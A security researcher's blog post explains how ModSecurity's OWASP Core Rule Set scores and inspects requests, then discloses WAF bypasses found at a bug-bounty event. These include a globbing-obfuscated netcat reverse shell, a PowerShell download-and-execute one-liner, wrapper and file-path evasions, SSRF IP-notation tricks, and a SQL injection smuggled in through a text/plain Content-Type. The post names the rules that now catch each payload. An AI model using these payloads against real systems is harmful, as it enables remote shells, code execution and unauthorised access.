Breaking the WAF Wall: ModSecurity CRS

Hey everyone! I’m so stoked to finally share this blog post that’s been sitting in my drafts since 2023. Life got busy and I lost my writing mojo for a bit, but I’ve finally gathered enough energy to finish this one up!

Today’s post explores the bypasses I discovered for the OWASP CRS (Core Rule Set) Project during the 1337UP0522 live hacking event hosted by The Paranoids team at Yahoo in collaboration with Intigriti. Needless to say, the event was a blast!

We will first cover how CRS works internally and how its rules are structured, and then walk through the bypasses. If you would rather skip the background, jump straight to the section titled The Bypasses.

Quick Primer to WAFs

Web Application Firewalls (WAFs) serve as a crucial security layer that blocks web-based attacks. The concept is straightforward: when an attacker sends a malicious request, the WAF intercepts and blocks it before it can reach the web application. WAFs operate by detecting attacks through a set of predefined rules. ModSecurity, for instance, is a popular open-source WAF implementation. A widely-adopted and compatible ruleset for ModSecurity is available through the OWASP CRS (Core Rule Set) Project.

How do ModSecurity and CRS work together?

Before we explore the bypasses in detail, it is important to understand the relationship between ModSecurity and CRS. In essence, ModSecurity serves as the engine that inspects and analyses HTTP requests and responses, while CRS provides the ruleset that matches various attack patterns.

CRS works in phases when inspecting requests and responses. A high-level overview of how CRS works is depicted below:

Essentially, every phase of the WAF inspects certain parameters of the HTTP transaction for anomalies:

Phase 1: Inspects HTTP request headers (e.g. blacklisted user-agents, protocol violations, etc).
Phase 2: Inspects the HTTP request body / parameters (e.g. SQLI, XSS, RCEs, etc.)
Phase 3: Inspects the response headers (e.g. sensitive data leaks, session management, etc.)
Phase 4: Inspects the response body (e.g. sensitive data leaks, stack traces, etc.)
Phase 5: Logging what was found in the previous phases (for audits, rule tuning, etc.)

CRS uses Anomaly Scoring to decide whether a request gets through or gets blocked. It also gives you different Paranoia Levels that you can adjust based on how secure you want your setup to be.

Anomaly Scoring

From official docs:

Anomaly scoring, also known as “collaborative detection”, is a scoring mechanism used in CRS. It assigns a numeric score to HTTP transactions (requests and responses), representing how ‘anomalous’ they appear to be. Anomaly scores can then be used to make blocking decisions. The default CRS blocking policy, for example, is to block any transaction that meets or exceeds a defined anomaly score threshold.

In short, CRS uses a point-based system called Anomaly Scoring to determine if a request is malicious. Each suspicious pattern adds points to a request’s score. If the total score meets or exceeds a threshold, the request gets blocked.
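To make the scoring idea concrete, here is a minimal Python sketch. It is a toy model, not CRS code. It assumes the default CRS severity scores (critical 5, error 4, warning 3, notice 2) and the default inbound threshold of 5; the function name and the sample matches are made up for illustration.

```python
# Toy model of anomaly scoring; not the real CRS implementation.
# Assumed defaults: CRS severity scores and an inbound threshold of 5.
SEVERITY_SCORES = {"CRITICAL": 5, "ERROR": 4, "WARNING": 3, "NOTICE": 2}
INBOUND_THRESHOLD = 5


def is_blocked(matched_severities, threshold=INBOUND_THRESHOLD):
    """Sum the score of every matched rule and compare it with the threshold."""
    score = sum(SEVERITY_SCORES[severity] for severity in matched_severities)
    return score >= threshold  # block when the score meets or exceeds it


print(is_blocked(["NOTICE"]))             # False: 2 is below the threshold
print(is_blocked(["WARNING", "NOTICE"]))  # True: 3 + 2 reaches the threshold
print(is_blocked(["CRITICAL"]))           # True: one critical match is enough
```

The point to take away is that no single rule has to be decisive: several weak signals can add up to a block.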

Paranoia Levels

From the official docs:

The paranoia level (PL) makes it possible to define how aggressive CRS is.

A higher paranoia level makes it harder for an attacker to go undetected. Yet this comes at the cost of more false positives: more false alarms. That’s the downside to running a rule set that detects almost everything: your business / service / web application is also disrupted.

Paranoia Levels let you define how thoroughly you want the WAF to examine incoming HTTP requests. CRS has 4 paranoia levels, level 1 to 4, with PL1 giving you basic protection and PL4 being super aggressive.

The higher you crank up those paranoia levels, the more rules get activated and the tighter the filtering becomes. PL4 can be a real pain in the neck even with regular traffic – it’s like having an overzealous bouncer at a club. Most folks stick with PL1 or PL2 to keep things running smoothly without going overboard.
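As a rough mental model, you can think of every rule as carrying a paranoia level tag, with a rule being active only when its tag is at or below the configured level. The sketch below uses the rule IDs and levels that show up later in this post; the dictionary and function names are hypothetical and this is not how CRS is implemented internally.

```python
# Rule IDs mapped to the paranoia level (PL) quoted for them in this post.
RULES = {930120: 1, 932130: 1, 932160: 1, 932240: 2, 932236: 2}


def active_rules(paranoia_level):
    """Return the rule IDs that would run at the configured paranoia level."""
    return sorted(rule_id for rule_id, pl in RULES.items() if pl <= paranoia_level)


print(active_rules(1))  # [930120, 932130, 932160]
print(active_rules(2))  # [930120, 932130, 932160, 932236, 932240]
```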

Rules in CRS

Now let’s talk about how rules work in CRS.

Rules within CRS are defined by the SecRule directive. Each SecRule has the following structure:

SecRule {VARIABLES} {OPERATOR} {"ACTIONS"}

VARIABLES: Defines which parts of the HTTP transaction to inspect (REQUEST_HEADERS, REQUEST_BODY, etc).
OPERATOR: Defines how to evaluate the selected variables, for example, regex matching (@rx), substring matching (@contains), etc.
ACTIONS: Defines what to do if the rule matches (phases, IDs, transformations, logging, blocking, scoring, etc).

So if a rule looks like:

SecRule REQUEST_HEADERS:User-Agent "@rx curl/.*" "id:1010,phase:1,log,pass,msg:'Detected curl client'"

Variable (REQUEST_HEADERS:User-Agent)

Directs ModSecurity to look at the User-Agent header.

Operator (@rx curl/.*)

Uses regular expressions to match any User-Agent containing curl/{any_version}.

Actions

Action (id:1010): Assigns a unique ID to the rule.
Action (phase:1): Runs the rule during request header parsing.
Action (log): Writes a log entry when the rule matches.
Action (pass): Allows the request to continue processing. No blocking or dropping occurs.
Action (msg:'Detected curl client'): Adds a custom message describing the detection.
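If it helps, here is roughly what that rule does, written out as plain Python. This is only an illustration of the variable, operator and actions working together; the function name and the log format are invented and ModSecurity does not work this way internally.

```python
import re


def rule_1010(request_headers, log):
    """Mimic the example rule: inspect User-Agent, log on match, never block."""
    user_agent = request_headers.get("User-Agent", "")  # REQUEST_HEADERS:User-Agent
    if re.search(r"curl/.*", user_agent):                # @rx curl/.*
        log.append("[id 1010] Detected curl client")     # log + msg
    return "pass"                                        # pass: processing continues


audit_log = []
print(rule_1010({"User-Agent": "curl/8.5.0"}, audit_log))   # pass
print(rule_1010({"User-Agent": "Mozilla/5.0"}, audit_log))  # pass
print(audit_log)  # ['[id 1010] Detected curl client']
```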

The Bypasses

Now, let’s talk about the bypasses. For each one below, I will break down my thought process and list the steps I took to craft it.

Spawning Reverse Shells

Spawning a reverse shell in *nix systems is pretty straightforward. A simple /bin/nc -e /bin/bash 10.0.0.2 10002 will connect back to your pingback server and you’ll be able to execute commands on the target machine. However, CRS properly detects and blocks the usage of nc (and all other variants).

This is where bash shell globbing patterns came to the rescue. My first attempt at a bypass looked like:

/[abc]in/nc -e /bin/bash 10.0.0.2 10002

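The bracket expression [abc] matches exactly one of the characters a, b or c, so /[abc]in/nc can match any of the paths below (the shell only expands it to the ones that actually exist):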

/ain/nc
/bin/nc <- Points to our binary
/cin/nc
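You can sanity-check the pattern without a shell. The snippet below uses Python’s fnmatch module, which follows shell-style wildcard rules; it is an approximation of bash globbing, not bash itself, and the candidate list (including /din/nc) is just made up for the demo.

```python
from fnmatch import fnmatchcase

PATTERN = "/[abc]in/nc"

# Hypothetical candidate paths; a real shell would only consider existing files.
candidates = ["/ain/nc", "/bin/nc", "/cin/nc", "/din/nc"]

matches = [path for path in candidates if fnmatchcase(path, PATTERN)]
print(matches)  # ['/ain/nc', '/bin/nc', '/cin/nc']
```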

But that got blocked too. Turns out /bin/bash was also on their radar. Time to RTFM. I found out that the other shell variants like /bin/sh, /bin/fish and /bin/ash were all blacklisted, except for /bin/zsh. So I managed to figure out a workaround with:

/[abc]in/nc -e /bin/zsh 10.0.0.2 10002

But the pattern was still getting blocked as nc -e is pretty much the poster child for reverse shells. After some trial and error, I discovered that ln (the command for linking files) wasn’t getting caught. Here’s what the final bypass payload ended up looking like:

ln -s /[abc]in/nc /tmp/pew; /tmp/pew -e /bin/zsh 10.0.0.2 10002

At the time of publishing the article, a set of 5 rules detects the payload:

930120 - OS File Access Attempt (PL1)
932130 - Remote Command Execution: Unix Shell Expression Found (PL1)
932160 - Remote Command Execution: Unix Shell Code Found (PL1)
932240 - Remote Command Execution: Unix Command Injection evasion attempt detected (PL2)
932236 - Remote Command Execution: Unix Command Injection (command without evasion) (PL2)

Executing Arbitrary PowerShell

PowerShell has some pretty nifty cmdlets that let you grab and execute remote scripts straight in memory - no need for the payload to ever hit the disk. Here’s what a typical fileless attack technique looks like:

Invoke-Expression (Invoke-WebRequest http://10.0.10.10:8000/x.ps1)

Invoke-WebRequest fetches the x.ps1 file from the remote host and Invoke-Expression executes it as PowerShell code. As expected, CRS blocks both cmdlets Invoke-Expression and Invoke-WebRequest.

Windows PowerShell, however, comes with a set of built-in aliases for a lot of the cmdlets, most of which CRS did not have in its blacklists.

That gives us a neat bypass:

iex (iwr http://10.0.10.10:8000/x.ps1)

As you probably know, PowerShell can be used to run binaries directly, something like powershell.exe C:\windows\system32\notepad.exe which brings up a notepad. The cool thing is that PowerShell itself doesn’t need the .exe extension to work, and that gives us another way to slip past the rules. Nothing fancy, just a simple trick:

powershell C:\wind??s\*32\note*.exe

To break the above payload down:

powershell - Equivalent of powershell.exe
? - Matches exactly 1 character
* - Matches 0 or more characters

So essentially:

wind??s matches windows
*32 matches the system32 folder
note*.exe matches notepad.exe
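The same wildcard semantics can be checked quickly in Python. Treat this as an approximation: fnmatch is not PowerShell’s path resolver (for one, its * can also cross path separators), and the list of paths is hypothetical.

```python
from fnmatch import fnmatchcase

PATTERN = r"C:\wind??s\*32\note*.exe"

# Hypothetical paths to test the pattern against.
paths = [
    r"C:\windows\system32\notepad.exe",
    r"C:\windows\system32\calc.exe",
    r"C:\winnt\system32\notepad.exe",
]

resolved = [path for path in paths if fnmatchcase(path, PATTERN)]
print(resolved)  # only the notepad.exe path under C:\windows\system32
```

Note that the literal strings windows, system32 and notepad never appear in the payload, which is exactly what a keyword blacklist would be looking for.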

At the time of publishing the article, the following two rules detect the payload:

932120 - Remote Command Execution: Windows PowerShell Command Found (PL1)
932240 - Remote Command Execution: Unix Command Injection evasion attempt detected (PL2)

Accessing Local Files

This section of bypasses was more source code review than hacker magic. CRS blacklists a list of default sensitive files that should not be allowed in HTTP requests.

The blacklist for SSH private keys within CRS looked something like this:

.ssh/authorized_keys
.ssh/config
.ssh/id_dsa
.ssh/id_dsa.pub
.ssh/id_rsa
.ssh/id_rsa.pub
.ssh/identity
.ssh/identity.pub
.ssh/known_hosts

Already noticed what’s missing? Yep, .ssh/id_ecdsa and .ssh/id_ecdsa.pub are missing.
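Here is a small sketch of why the gap matters. It assumes the blacklist is applied as a plain substring match against the request, which is a simplification of what the real rule does; the function name is hypothetical and the entries are the ones listed above.

```python
# Entries copied from the list above.
SSH_BLACKLIST = [
    ".ssh/authorized_keys",
    ".ssh/config",
    ".ssh/id_dsa",
    ".ssh/id_dsa.pub",
    ".ssh/id_rsa",
    ".ssh/id_rsa.pub",
    ".ssh/identity",
    ".ssh/identity.pub",
    ".ssh/known_hosts",
]


def is_blacklisted(payload):
    """Assumed behaviour: case-insensitive substring match against each entry."""
    lowered = payload.lower()
    return any(entry in lowered for entry in SSH_BLACKLIST)


print(is_blacklisted("../../home/user/.ssh/id_rsa"))    # True
print(is_blacklisted("../../home/user/.ssh/id_ecdsa"))  # False
```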

Similarly, the list was missing a couple of other important files:

/etc/security/pwquality.conf
/etc/security/faillock.conf

These give us our third bypass.

This bypass was properly fixed by updates to the lfi-os-files.data file, which is used by rule 930120:

930120 - OS File Access Attempt (PL1)

Abusing Legacy Protocols and PHP Wrappers

A lesser known, legacy Java (<= JDK 8) protocol is netdoc:, which acts similarly to the file: protocol in Java-based XML parsers. CRS appropriately detects usage of most protocols like http://, ftp://, file://, etc, but does not filter out netdoc:. This makes it possible to bypass CRS in Java environments (<= JDK 8).

netdoc:///etc/passwd

Now if we put all these missing files together, we can whip up something like this:

netdoc:///etc/security/pwquality.conf

Missing PHP wrappers also contributed to another bypass. I noticed that compress.zlib://, zlib://, glob://, expect://, zip://, etc. were blocked, but compress.bzip2:// wasn’t.

compress.bzip2://path/to/sensitive.bz2

The following set of rules detect these payloads now:

931130 - Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link (PL2)
933200 - PHP Injection Attack: Wrapper scheme detected (PL1)
942460 - Meta-Character Anomaly Detection Alert - Repetitive Non-Word Characters

Bypassing Blacklisted IP Address Notations

SSRF

The ssrf.data file contains a list of blacklisted IP address notations intended to prevent Server-Side Request Forgery (SSRF) attempts.

IP address notations are wild. For example, the following variations all resolve to the same IP address 1.0.0.1:

http://1.0.0.1
http://1.0.1
http://1.1
http://16777217
http://0x1.0x0.0x0.0x1
http://0x01000001
http://0x1.0x000001
http://01.00.00.01
http://000000001.0000.00000000.001
http://0100000001
http://%31%2e%30%2e%30%2e%31
http://1.0x0.00000000.0x1

If you’re bamboozled and scratching your head over how this is possible, I’d suggest reading the inet_aton(3) manual page.
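If you would rather see the logic than read the man page, below is a pure-Python sketch of the classic inet_aton parsing rules: one to four dot-separated parts, each in decimal, octal (leading 0) or hex (leading 0x), with the last part filling all the remaining bytes. The function name is mine and this is a simplified re-implementation for illustration, not the libc code. URL-decoding (needed for the percent-encoded variant) is out of scope here.

```python
def normalize_ipv4(text):
    """Convert an inet_aton-style IPv4 notation to dotted-quad form."""
    parts = text.split(".")
    if not 1 <= len(parts) <= 4:
        raise ValueError("expected 1 to 4 parts")

    values = []
    for part in parts:
        if part.lower().startswith("0x"):
            values.append(int(part[2:], 16))  # hexadecimal
        elif len(part) > 1 and part.startswith("0"):
            values.append(int(part, 8))       # octal
        else:
            values.append(int(part, 10))      # decimal

    *head, last = values
    remaining = 4 - len(head)                 # bytes covered by the last part
    if any(not 0 <= v <= 255 for v in head) or not 0 <= last < 256 ** remaining:
        raise ValueError("part out of range")

    address = 0
    for v in head:
        address = (address << 8) | v
    address = (address << (8 * remaining)) | last
    return ".".join(str((address >> shift) & 0xFF) for shift in (24, 16, 8, 0))


for notation in ["1.0.1", "1.1", "16777217", "0x01000001", "0100000001"]:
    print(notation, "->", normalize_ipv4(notation))  # each prints 1.0.0.1
```

A WAF (or an application) that wants to blacklist IP addresses reliably would need to canonicalise the host like this before comparing it against the list.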

When an SSRF exploit involves localhost IP addresses, the Core Rule Set (CRS) attempts to block such requests to prevent exploitation. However, the blacklist entries for IPs like 127.0.0.1 can be easily bypassed using alternate notations like:

http://127.1

Similarly, the blacklist for the Oracle Cloud metadata endpoint (192.0.0.192) can be bypassed using:

http://192.192/{version}/metadata

Do note that this is probably the most straightforward technique. As noted earlier, you can use more creative approaches using hexadecimal notation, octal representations, and various IP encoding schemes to evade detection.

RFI

In Java environments, the JarURLConnection class permits access to the contents of a JAR file (or an entry within one) using a URL, including URLs with the http scheme. For example:

jar:http://10.0.123.234/bar/baz.jar!/COM/foo/qutie.class

This retrieves the qutie.class file from the baz.jar archive via HTTP from 10.0.123.234.

Now let’s say a malicious actor hosts a rogue JAR file on their server at 10.0.123.234 (which is a known blacklisted IP IOC) and tries to trick the target app into fetching classes straight from it. When you combine this trick with those sneaky IP notation bypasses we just covered, you can cook up some nasty payloads like:

jar:http://10.31722/bar/baz.jar!/COM/foo/qutie.class
jar:http://167803882/bar/baz.jar!/COM/foo/qutie.class

Both examples resolve to the attacker-controlled IP 10.0.123.234, allowing malicious retrieval of the qutie.class file.
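In case you are wondering where 31722 and 167803882 come from, the arithmetic is short enough to do with Python’s standard ipaddress module. The variable names are just for the demo.

```python
import ipaddress

target = ipaddress.IPv4Address("10.0.123.234")

# Whole address as one 32-bit integer: 10*256**3 + 0*256**2 + 123*256 + 234
as_integer = int(target)

# Two-part form: first octet, then the remaining 24 bits as a single number
first_octet = target.packed[0]
low_24_bits = as_integer & 0xFFFFFF  # 0*256**2 + 123*256 + 234

print(as_integer)                      # 167803882
print(f"{first_octet}.{low_24_bits}")  # 10.31722
```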

At the time of writing this blogpost, the following 2 rules detect the above payloads:

931130 - Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link
934110 - Server Side Request Forgery (SSRF) Attack: Cloud provider metadata URL in Parameter

Complete Request Body Bypass

This one is definitely worth highlighting, as it is probably the most interesting finding I came across.

While digging through the documentation and source code to understand how ModSecurity decides which rules to activate, I stumbled upon something interesting: ModSecurity uses specific body processors based on what Content-Type header it detects. These processors are basically designed to take the request body and break it down into something the rules can actually work with.

The JSON and XML parsers get turned on dynamically by rules in the ModSecurity config, usually through the ctl:requestBodyProcessor action within a SecRule that matches the right Content-Type header.

Here are the parsers that the WAF engine can handle:

application/x-www-form-urlencoded: This is the standard for regular forms. ModSecurity takes this and breaks it down into ARGS (arguments) variables that the rules can access.
multipart/form-data: Used when you’re uploading files. This one’s a bit more complicated since it needs special parsing to tell the difference between regular form fields and the actual uploaded files.
application/json: This triggers the JSON parser.
(text|application)/xml: This triggers the XML parser.

This got me thinking – what about backends that do not rely on the Content-Type header to process requests? What happens when I use text/plain? To my surprise, it actually worked. Payloads as simple as cat ../../etc/passwd (which will easily get detected at PL1) sailed right through the WAF completely unchecked.

Let’s try to understand why this bypass is quite lethal.

Suppose a user login endpoint request looks something like this:

POST /login HTTP/1.1
Host: api.example.com
Content-Type: application/json
Content-Length: 39

{"username":"admin","password":"admin"}

A classic SQL injection attack to bypass the login flow would look like this:

POST /login HTTP/1.1
Host: api.example.com
Content-Type: application/json
Content-Length: 58

{"username":"admin","password":"idkthepassword' OR 1=1--"}

With CRS enabled, the following rules would come shouting at you:

942130 PL2 SQL Injection Attack: SQL Boolean-based attack detected
942180 PL2 Detects basic SQL authentication bypass attempts 1/3
942330 PL2 Detects classic SQL injection probings 1/3
942390 PL2 SQL Injection Attack
942521 PL2 Detects basic SQL authentication bypass attempts 4.0/4
942522 PL2 Detects basic SQL authentication bypass attempts 4.1/4

If you set the Content-Type header to text/plain and the backend doesn’t bother checking the header and just goes ahead and decodes the request body anyway, ModSecurity does not activate the JSON body processor, so the body is never broken down into the variables that the rules inspect. This allows you to slip in any payload within the request:

POST /login HTTP/1.1
Host: api.example.com
Content-Type: text/plain
Content-Length: 58

{"username":"admin","password":"idkthepassword' OR 1=1--"}
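To see the mismatch end to end, here is a toy simulation in Python. Everything in it is a stand-in: the regex is a crude placeholder for the SQLi rules, the toy WAF only inspects values produced by a body processor (mirroring the behaviour described above), and the backend is a hypothetical handler that JSON-decodes whatever it receives.

```python
import json
import re

# Crude placeholder for the SQLi rules; the real CRS rules are far more thorough.
SQLI = re.compile(r"'\s*OR\s+1=1", re.IGNORECASE)


def waf_inspected_values(content_type, body):
    """Return the values the toy WAF gets to inspect for this request."""
    if content_type == "application/json":
        return [str(value) for value in json.loads(body).values()]
    return []  # toy assumption: no body processor, so nothing is parsed


def waf_blocks(content_type, body):
    return any(SQLI.search(value) for value in waf_inspected_values(content_type, body))


def backend_password(body):
    """Hypothetical backend that decodes JSON regardless of Content-Type."""
    return json.loads(body)["password"]


BODY = '{"username":"admin","password":"idkthepassword\' OR 1=1--"}'

print(waf_blocks("application/json", BODY))  # True: the payload is parsed and caught
print(waf_blocks("text/plain", BODY))        # False: the toy WAF never sees the value
print(backend_password(BODY))                # the backend still receives the injection
```

The WAF and the backend disagree about what the body is, and the attacker gets to pick the interpretation that suits them.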

The CRS project has since removed the non-standard text/plain from its list of allowed values within the Content-Type header (6a9c854) and has introduced a warning message about the bypass:

# Bypass Warning: some applications may not rely on the content-type
# request header in order to parse the request body. This could make
# an attacker able to send malicious URLENCODED/JSON/XML payloads
# without being detected by the WAF. Allowing request content-type
# that doesn't activate any body processor (for example: "text/plain",
# "application/x-amf", "application/octet-stream", etc..) could lead
# to a WAF bypass. For example, a malicious JSON payload submitted with
# a "text/plain" content type may still be interpreted as JSON by a
# backend application but would not trigger the JSON body parser at the
# WAF, leading to a bypass. To avoid bypasses, you must enable the appropriate
# body parser based on the expected data in the request bodies (For example
# JSON for JSON data, XML for XML data, etc).

The WAF now properly detects and flags such non-standard content-types via:

920420 - Request content type is not allowed by policy

Credit Where It’s Due

ModSecurity and the OWASP Core Rule Set (CRS) are invaluable contributions to the open-source community.

I want to give a huge shoutout to their maintainers for keeping such a critical security project alive and well. I also extend my gratitude to Intigriti and the @TheParanoids team at Yahoo for organizing the hacking event and for the kind invitation to participate.

That’s all folks. Thanks for sticking with me through this! Cheers! 🥂